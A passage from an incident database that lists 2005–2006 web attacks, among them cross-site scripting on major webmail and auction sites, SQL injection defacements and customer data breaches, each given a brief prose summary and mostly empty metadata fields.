Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Forget putting <script> tags in input field. This high tech vulnerability exploits the code handling online/offline flags by inserting a malicious online/offline flag. Awesome.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-17: Mass defacement using XSS at Israblog
WHID ID: 2006-17
Date Occured: 4/10/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Israblog is a large Israeli blogging site. A hacker used XSS to hijack bloggers sessions and deface them. The defacing was used to inform the world that Israblog lead developer is a bad programmer.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-16: AstraTel customer call records leaked
WHID ID: 2006-16
Date Occured: 4/10/2006
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A security hole in Sydney internet provider Astratel's LiveBilling online account management system has seriously compromised its customers' privacy.

The service redirected users to a different server and propagated the user information in a hidden field without re-authenticating.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-15: eBay contains a cross-site scripting vulnerability
WHID ID: 2006-15
Date Occured: 4/4/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

eBay contains a cross-site scripting vulnerability. When an eBay user posts an auction, eBay allows SCRIPT tags to be included in the auction description which creates a cross-site scripting vulnerability in the eBay website

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-14: Forgotten password clues create hacker risk
WHID ID: 2006-14
Date Occured: 4/4/2006
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A UK Security Consulting firm reports that 54 UK sites that it has surveyed have flaws in the "forgotten password" feature.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-13: Hackers Tap Banks' Web Sites In Unique Phishing Attack
WHID ID: 2006-13
Date Occured: 4/4/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

In this very interesting attack a hacker broke into the informational web sites of several smaller banks in Florida. He than changed the link on the informational pages that points to the outsourced transactional web site to point to his own phishing site.
While the vulnerability that enabled the hacker to penetrate the informational sites is not known, this is a very interesting example of a targeted web attack. It highlights the importance of protecting every web site and not just the core business logic.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-12: Music Web Site: Breach Exposed Accounts
WHID ID: 2006-12
Date Occured: 3/22/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A musical instrument and sound gear Web site that advertises its relationship with artists such as Dave Matthews, Carlos Santana and Mary J. Blige was breached and notified some customers that their credit card information may have been stolen.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-11: Teenager claims to find code flaw in Gmail
WHID ID: 2006-11
Date Occured: 3/5/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A 14 years old claims to have discovered an XSS flaw in Google's Gmail. Comments have been mixed, and Google did not comment, so either the flaw was fixed pretty fast, or did not exits.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-10: NUJP website defacement seen not related to political crisis
WHID ID: 2006-10
Date Occured: 3/5/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A mass defacement of a Philippine hosting service was carried our using SQL injection. It accidentally also defaced the site of the National Union of Journalists of the Philippines, which led some to believe that it was a targeted political attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-9: EBay XSS
WHID ID: 2006-9
Date Occured: 3/3/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disinformation
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Unlike other XSS cases, this was discovered due to actual abuse on a specific auction at EBay.

Additional information:

  • Ebay XSS [Full Disclosure, Feb 28 2006]

Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-8: ICQmail.com - Mail2World.com XSS vulnerability
WHID ID: 2006-8
Date Occured: 3/5/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Links sent to a user as part of the mail content are not properly sanitized, so a user receiving such mail and activating a link would be affected.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-7: Google Reader "preview" and "lens" script improper feed validation
WHID ID: 2006-7
Date Occured: 3/5/2006
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Google reader allows redirection so sites can fool users to subscribe to malicious content.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-6: Hacker breaks into Buffalo sports site
WHID ID: 2006-6
Date Occured: 3/22/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A site of a minor league baseball team was hacked and personal details of fans was stolen.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-5: Hotmail XSS (1)
WHID ID: 2006-5
Date Occured: 3/29/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Hotmail's filtering engine insufficiently filters JavaScript scripts. It is possible to write JavaScript in the BGCOLOR attribute of the BODY tag, using CSS. This leads to execution when the email is viewed. JavaScript must be Unicode encoded in order to fool the filter. This encoding is recognized with IE >= 6

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-4: Hacker diverts traffic from city's Web page
WHID ID: 2006-4
Date Occured: 2/26/2006
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A hoster was broken into by brute forcing passwords in a management interface. Sites of many clients, including three municipalities where defaced.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-3: Russian hackers broke into a RI GOV website
WHID ID: 2006-3
Date Occured: 2/26/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Russian hackers broke into a Rhode Island government Web site and allegedly stole credit card data from individuals who have done business online with state agencies. The hackers claimed to have stolen 53,000 credit card numbers, while the hosting service provider claims the number was just 4113.

The technical reference site is in Russian, you can use Applied Languages Solutions for an online translations.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-2: GSA takes down eOffer after finding security flaw
WHID ID: 2006-2
Date Occured: 2/26/2006
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Documents uploaded to GSA site where accessed using a predictable sequential identifier without requiring special permissions. The documents where available both for viewing and modifying. The site was in service for more than 18 months until the vulnerability was discovered.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-1: Google's Blogger HRS vulnerability
WHID ID: 2006-1
Date Occured: 2/26/2006
Attack Method: HTTP Response Splitting
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-65: LexisNexis Data Breach
WHID ID: 2005-65
Date Occured: 2/17/2008
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description:

The LexisNexis data breach is not new, but we have recently decided to start tracking abuse of insufficient automation measures and are adding historical incidents.

In this incident a group of people opened accounts at data broker LexisNexis and used automated tools to extract a large amount of personal information provided by the service.

As usual in such cases there is a question of whether the attack was a criminal activity, violation of the license agreement of the information provider or plainly legal. In this regard it is interesting to note that the group arrested in the incident was also responsible for the hacking to Paris Hilton Vodafone account, which was clearly an unlawful act.

Back in 2005 this data breach was one of the first such incidents, generated a lot of media interest, and led to more regulation regarding information aggregators. Interestingly, the excuse given by the company was that the incident was that there was no security failure in the web site, but that the procedures where lacking. We accepted this story at the time, but today we believe that such automation and scraping attacks are among the most dangerous attacks.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-64: Woman scammed QVC for $400,000+ in Internet glitch
WHID ID: 2005-64
Date Occured: 11/20/2007
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Process Validation
Outcome: Monetary Loss
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description:

A woman exploited a bug in QVC shopping network web site to get, without paying, more than 1800 items worth $412,000 items from the March to November 2005. The glitch enabled her to cancel orders she placed at a specific time and still get the product.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-63: Web designer sentenced for hacking competitor's site
WHID ID: 2005-63
Date Occured: 8/14/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While lacking in technical details, this story is certainly juicy. It demonstrates well the business use of web site hacking. The downside is that the hacker got only a minimal punishment, which unless the incident itself is overrated in the media, is a very bad sign on how courts view computer crime.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-62: Guidance Software
WHID ID: 2005-62
Date Occured: 4/18/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

3,800 customer credit-card numbers were stolen in the attack on Guidance Software web site. This incident is made more severe since Guidance software is a provider of software for investigating security breaches and many of its clients are security and law enforcement agencies, some of them known to be affected.


As usual in such cases the actual way in which the information was stolen was not disclosed. A federal trade commission report on the incident, published only in 2007, revealed that the incident was a result on an SQL injection attack on Guidance servers. In a settlement with the FTC, Guidance agreed to implement a comprehensive information security program, including independent, third-party audits every other year for the next ten years.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-61: Gmail session management bug
WHID ID: 2005-61
Date Occured: 4/12/2006
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A bug in Gmail's authentication and session management allows direct login to anybodies account without requiring any involvement of the victim.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-60: KU shuts down housing application Web site
WHID ID: 2005-60
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Web site used to file online for housing at KU was shutdown for lack of proper security measures to prevent visitors from viewing personal information about others

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-59: Vote Someone Else's Shares
WHID ID: 2005-59
Date Occured: 2/28/2006
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Janus mutual fund uses predictable identifier to authenticate its share holders enabling them to vote for others.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-58: Yahoo mail Cross Site Scripting
WHID ID: 2005-58
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An attacker can send an e-mail with a malicious script to a victim which is perform its actions immediately when the e-mail is read.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-57: RPG site bit by hackers
WHID ID: 2005-57
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

User data stolen from an online game web site. The hacker tried to extort RPG by threatening to publish the users' data. The news item states that the hack was a result of a flaw in custom web site software.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-56: XSS vulnerabilities in Google.com
WHID ID: 2005-56
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A redirection to an error page on Google.com includes values sent by the the user. This vulnerability allows phishers to send an e-mail with links to Google that will include their attack page.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-55: Yahoo RSS XSS Vulnerability
WHID ID: 2005-55
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A malicious site can offer users a malformed RSS XML file to be included Yahoo RSS aggregation that would enable stealing Yahoo cookies

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-54: XSS vulnerability in NIST web site
WHID ID: 2005-54
Date Occured: 2/26/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Netcraft discovered an XSS vulnerability in NIST web site, which ironically hosts the U.S. National Vulnerability Database.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-53: Charity Web Site Hacked
WHID ID: 2005-53
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Credit Card Leakage
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A UK Church charity web site was hacked and at least 3000 credit card numbers where stolen. Credit card information is known to have been used by the hackers. While no specific details are given, the article indicates that the way site was hacked.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-51: Critical MySpace Vulnerabilities Leave Every Active Account Exploitable
WHID ID: 2005-51
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS when receiving notification of an incoming IM message. Additionally it is possible to send an IM message to somebody who has blocked such messages by pretending to be answering a message from him.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-50: XSS on Yahoo Mail
WHID ID: 2005-50
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Inserting code in an HTML attachments enables changing the user interface of Yahoo mail, which may enable fraud.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-49: Google Base launched with security hole
WHID ID: 2005-49
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

XSS in Google Base search function

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-48: Insufficient authorization on Papa John's Pizza chain web site
WHID ID: 2005-48
Date Occured: 11/10/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-47: SEC Vs. The Estonian Spiders
WHID ID: 2005-47
Date Occured: 11/8/2005
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Business wire allowed access to non published press releases.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-46: Teen uses SQL injection to break to a security magazine web site
WHID ID: 2005-46
Date Occured: 2/26/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A high school student used SQL injection to break into the site of a Taiwanese information security magazine from the Tech Target group and steal customer's information.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-44: Xoops web site hacked
WHID ID: 2005-44
Date Occured: 11/8/2005
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Configuration mistake left an unprotected unused virtual host. No details on the configuration problems given.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-43: XSS in Yahoo's Web mail enables phishing
WHID ID: 2005-43
Date Occured: 11/10/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

XSS in Yahoo mail, Allows phishing

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-42: Default password in a common application used by schools
WHID ID: 2005-42
Date Occured: 11/10/2005
Attack Method: Administration Error
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The software has a default password for teachers, enabling anyone to access the system with teachers privileges.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-41: XSS on Google's AdWords enables phishing
WHID ID: 2005-41
Date Occured: 11/10/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-40: Defacement of several Novell websites
WHID ID: 2005-40
Date Occured: 11/8/2005
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Script upload due to a scoop known vulnerability

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-39: Promotional Firefox community site hacked (again)
WHID ID: 2005-39
Date Occured: 11/8/2005
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Exploited unpatched Twiki

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-38: Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers
WHID ID: 2005-38
Date Occured: 9/12/2005
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Teen convicted of threatening an ISP with DOS attack, among other computer hacking activities

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-37: A 12 years old hacked an online game and stole game items
WHID ID: 2005-37
Date Occured: 9/12/2005
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Information Warfare
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A 12 years old guess login information of a woman and abused her account, stealing game items from her.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-36: Predictable delay in an online poker game enabled users to beat the casino
WHID ID: 2005-36
Date Occured: 9/4/2005
Attack Method: Unintentional Information Disclosure
Application Weakness: Abuse of Functionality
Outcome: Monetary Loss
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A player of an online game discovered that considerable delay hinted on the cards the dealer holds.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-35: Stanford University web sites defaced using XMLRPC bug
WHID ID: 2005-35
Date Occured: 8/23/2005
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Sites where defaced by utilizing an issue in an XMLRPC library used by PHP

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-34: Man logs into dabs.com misc customer account
WHID ID: 2005-34
Date Occured: 8/22/2005
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-33: Insufficient authorization on Verizon's MyAccount feature
WHID ID: 2005-33
Date Occured: 8/22/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A web site flaw could have allowed a user to view another subscriber's balance of remaining airtime minutes and the number of minutes that customer had used in the current billing cycle

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-32: Weak password recovery on Citrix's site
WHID ID: 2005-32
Date Occured: 8/8/2005
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Password Recovery
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Weak password recovery procedure at Citrix

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-31: Hacker forced new planet discovery out of the closet
WHID ID: 2005-31
Date Occured: 8/4/2005
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-30: Blogger Developers Network Blog Cracked
WHID ID: 2005-30
Date Occured: 8/4/2005
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Official answer from Blogger was that this was not the result of a hack attempt but of a subtle bug that occurred because our Developer's Network blog is a special case [it's got two names, 'code.blogger.com' and 'code.blogspot.com'].

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-29: Security issues in interactive hotel TVs
WHID ID: 2005-29
Date Occured: 7/31/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While not strictly web security, this discussion of hotel rooms TV application security is a very good example of the dangers of our networked society

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-28: Phishers Steal Trust from eBay Sign In Pages
WHID ID: 2005-28
Date Occured:
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-27: Phishers hack eBay
WHID ID: 2005-27
Date Occured: 8/8/2005
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A bug in an eBay site allowed Phishers to redirect users to their own servers after feeling details at the genuine eBay site

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
